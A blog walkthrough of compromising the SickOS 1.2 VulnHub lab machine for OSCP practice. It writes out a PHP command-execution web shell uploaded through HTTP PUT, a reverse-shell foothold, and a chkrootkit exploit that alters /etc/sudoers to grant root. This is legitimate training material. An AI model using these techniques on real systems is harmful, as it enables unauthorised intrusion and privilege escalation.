---
layout: post
title: "Sick OS 1.2"
date: 2020-08-19
ctf: true
excerpt: "Walkthrough for Sick OS 1.2 on Vulnhub"
tags: [OSCP, chkrootkit, privilege escalation, curl, nmap http-put]
comments: false


---

[SickOS 1.2](https://www.vulnhub.com/entry/sickos-12,144/) a vulnerable machine found on the [NetSecFocus Trophy Room](https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=0) list which I have been using as preparation for the OSCP. Below is a walkthrough to compromise this machine.

First, after downloading and importing the machine into VMware, I had to figure out the IP address of the machine. I used **netdiscover -i eth0** until I came across the IP of this machine.

![SickOS 1.2 netdiscover]/assets/img/SickOS1.png)

Next I ran **threader3000** and let it run its recommended nmap scan.

![SickOS 1.2 threader3000 nmap]/assets/img/SickOS2.png)

It appears that SSH and HTTP are open. I pulled up the main website and was presented with the following.

![SickOS 1.2 website]/assets/img/SickOS3.png)

I decided to run **gobuster dir -u http://[machine ip] -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x .php,.txt -t 50** to enumerate the website. It uncovered a **/test** subdirectory.

![SickOS 1.2 gobuster]/assets/img/SickOS4.png)

I navigated to this page, and it appears to list contents of this directory, which has nothing in it.

![SickOS 1.2 /test]/assets/img/SickOS5.png)

I looked around and didn't see anything we could immediately exploit and there were not any other uncovered pages. I decided to use **curl -X OPTIONS -v http://[machine ip]/test** to see what was allowed in this directory. I uncovered that **PUT** was allowed.

![SickOS 1.2 curl]/assets/img/SickOS6.png)

With this discovery, I used **nmap [machine ip] -p 80 --script http-put --script-args http-put.url='/test/shell.php', http-put.file='[location to reverse shell file]'**. I used the reverse shell from [PenTestMonkey](http://pentestmonkey.net/tools/web-shells/php-reverse-shell).

![SickOS 1.2 nmap http-put]/assets/img/SickOS7.png)

I then tested this with a reverse shell, but unfortunately it didn't work. I instead created a php file with **\<?php $cmd=$_GET['cmd'];system($cmd);?\>** in it, and saved it as CommandExecution.php. I then uploaded it the same way I uploaded the reverse shell in the prior step.

![SickOS 1.2 nmap http-put 2]/assets/img/SickOS8.png)

Next, I opened a reverse shell listener on port 443 on my attacker computer.

![Sick OS 1.2 nc listener]/assets/img/SickOS9.png)

After trial and error, I discovered that running a Python reverse shell with the command injection script worked, and gave us an initial foothold on the victim PC.

![Sick OS 1.2 python reverse shell]/assets/img/SickOS10.png)

Next, I ran who and it revealed we have a shell as **www-data**, I then ran **python -c 'import pty; ptw.spawn("/bin/sh")'** to upgrade my shell to a TTY shell.

![Sick OS 1.2 www-data shell]/assets/img/SickOS11.png)

Next, I tried navigating to the tmp directory and using wget to copy over linpeas for enumeration, but that was unsuccessful. However, we knew we could use nmap (as we had done twice earlier) to copy over files. I did this to copy over linpeas.

![Sick OS 1.2 nmap http-put 3]/assets/img/SickOS12.png)

Next, I ran **chmod +x linpeas.sh** to make linpeas executable and started it with **./linpeas.sh**.

![Sick OS 1.2 chmod +x]/assets/img/SickOS13.png)

Linpeas returned some interesting information.

![Sick OS 1.2 linpeas 1]/assets/img/SickOS14.png)

![Sick OS 1.2 linpeas 2]/assets/img/SickOS15.png)

![Sick OS 1.2 linpeas 3]/assets/img/SickOS16.png)

It appears that the kernel is exploitable and gcc is installed to compile exploits. **chrootkit** is also setup as a cron job and some versions are vulnerable to exploit. I ran **chkrootkit -V** to see the version that was installed.

![Sick OS 1.2 chkrootkit -V]/assets/img/SickOS17.png)

Back on our attacker pc, I ran **searchsploit chkrootkit**. One of the results returns the version that is installed on the victim machine!

![Sick OS 1.2 searchsploit chkrootkit]/assets/img/SickOS18.png)

Next, I ran **searchsploit -x 33899** to view the contents of this file. It tells you how to exploit **chkrootkit **.

![SickOS 1.2 searchsploit -x 33899]/assets/img/SickOS19.png)

I navigated to the tmp folder with **cd /tmp** and ran **echo "chmod 777 /etc/sudoers" > update** and made it executable with **chmod +x update**. I then waited a couple of minutes for this to be triggered.

![Sick OS 1.2 update file]/assets/img/SickOS20.png)

I then ran **ls -al /etc |grep sudoers**, which showed that the permissions on this file had been updated!

![Sick OS 1.2 ls -al /etc]/assets/img/SickOS21.png)

Next, I ran **echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers** to give the www-data the ability to run anything as root with sudo with no password.

![Sick OS 1.2 modify /etc/sudoers]/assets/img/SickOS22.png)

Next, I ran **sudo su**, which didn't work because permissions on /etc/sudoers should be 440.

![Sick OS 1.2 sudo su failed]/assets/img/SickOS23.png)

Next, I went back to the /tmp directory and updated the update file with **echo "chmod 0440 /etc/sudoers" > update**. I waited a couple of minutes for this to take effect.

![Sick OS 1.2 modify update file]/assets/img/SickOS24.png)

I then ran **ls -al /etc|grep sudoers**, which showed the permissions had been changed back to the proper permissions. I then ran **sudo su** which gave me a root shell.

![Sick OS modify sudoers permissions]/assets/img/SickOS25.png)

I then ran **cd /root** followed by **ls -al**. There was a flag file present, which I viewed the contents of with **cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt**, which showed the information below!

![]/assets/img/SickOS26.png)
